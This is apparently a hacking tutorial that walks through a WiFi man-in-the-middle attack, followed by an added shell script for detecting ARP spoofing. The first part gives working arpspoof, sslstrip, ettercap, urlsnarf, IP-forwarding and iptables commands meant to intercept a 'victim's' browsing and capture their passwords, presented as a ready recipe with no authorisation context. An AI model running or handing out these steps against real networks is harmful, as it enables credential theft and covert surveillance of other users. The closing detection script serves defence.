1. Working wireless LAN card, connected to any hotspot
2. SSLStrip installed
3. Ettercap installed
4. urlsnarf installed
5. arpspoof installed
All of these come pre-installed on BT 5.
Step 1: First, make sure that we are connected to a WiFi network, then scan for the available online nodes using any network scanning software.
Step 2: Once we have found the victim, run this command and keep it running in the shell. This command will spoof the ARP requests towards your PC:
    arpspoof -i wlan0 -t 192.168.2.149 192.168.2.1
Explanation:
    arpspoof -i NETWORK-INTERFACE -t IP-OF-VICTIM ROUTER-IP-ADDRESS
The -i switch defines the interface. In my case I used wireless, so it is wlan0; if you are trying it over Ethernet it would be the appropriate eth0 or eth1 device, if you have more than one network interface card.
Step 3: Now open another shell and execute sslstrip. Note: if you are running BackTrack 5, go to /pentest/web/sslstrip.
    ./sslstrip -a -k -f
Keep this shell open and do not close it.
Step 4:
    ettercap -Tq -L etterlogs -i wlan0
Do not close this shell either; keep it open. This is the shell where you will actually see the password.
Step 5: Open another shell and run this command:
    urlsnarf -v -i wlan0
This command will show you in real time what your victim surfs on the internet.
Step 6: Enable IP forwarding on your Linux box by executing the command below:
    echo 1 > /proc/sys/net/ipv4/ip_forward
Step 7: As a final step we have to create the rule below in iptables:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Once all is done you will start seeing the victim's internet browsing in the window that you opened in Step 5. Be patient until you see the customer logging into a website. If he is already logged in you will not be able to get his password.
credit to Gerti1
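Seen from the victim's machine, the ARP spoofing in Step 2 leaves a trace in the neighbour cache that can be checked for. The following is an added example, not part of the original post: it assumes the output format of `ip neigh show`; the function names, the 192.168.2.50 host and all MAC addresses are made up for illustration.

```shell
#!/bin/sh
# Added defensive example, not from the original post.
# Input: neighbour-table lines in the format printed by `ip neigh show`, e.g.
#   192.168.2.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE

# Print "<mac> <ip1>,<ip2>,..." for every MAC cached for more than one IPv4
# address. During the spoofing in Step 2 the router IP and the spoofing
# host's own IP resolve to the same MAC in the victim's table.
find_shared_macs() {
    awk '
        {
            mac = ""
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            # Skip FAILED/INCOMPLETE entries (no MAC) and IPv6 neighbours.
            if (mac == "" || $1 ~ /:/) next
            if (mac in ips) ips[mac] = ips[mac] "," $1
            else { ips[mac] = $1; order[++n] = mac }
            count[mac]++
        }
        END {
            for (k = 1; k <= n; k++)
                if (count[order[k]] > 1) print order[k], ips[order[k]]
        }'
}

# Compare the MAC cached for the gateway with a known-good value recorded
# while the network was trusted. Exit status: 0 match, 1 mismatch, 2 no entry.
check_gateway() {   # usage: ip neigh show | check_gateway GATEWAY_IP KNOWN_MAC
    awk -v gw="$1" -v want="$2" '
        $1 == gw {
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") { seen = 1; bad = (tolower($(i + 1)) != tolower(want)) }
        }
        END { if (!seen) exit 2; exit bad }'
}

# Constructed sample table: 192.168.2.1 is the router from the post;
# 192.168.2.50 and all MAC addresses are made up for illustration.
SAMPLE_TABLE='192.168.2.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.2.50 dev wlan0 lladdr 00:11:22:33:44:55 STALE
192.168.2.20 dev wlan0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.2.30 dev wlan0 FAILED'

printf '%s\n' "$SAMPLE_TABLE" | find_shared_macs
```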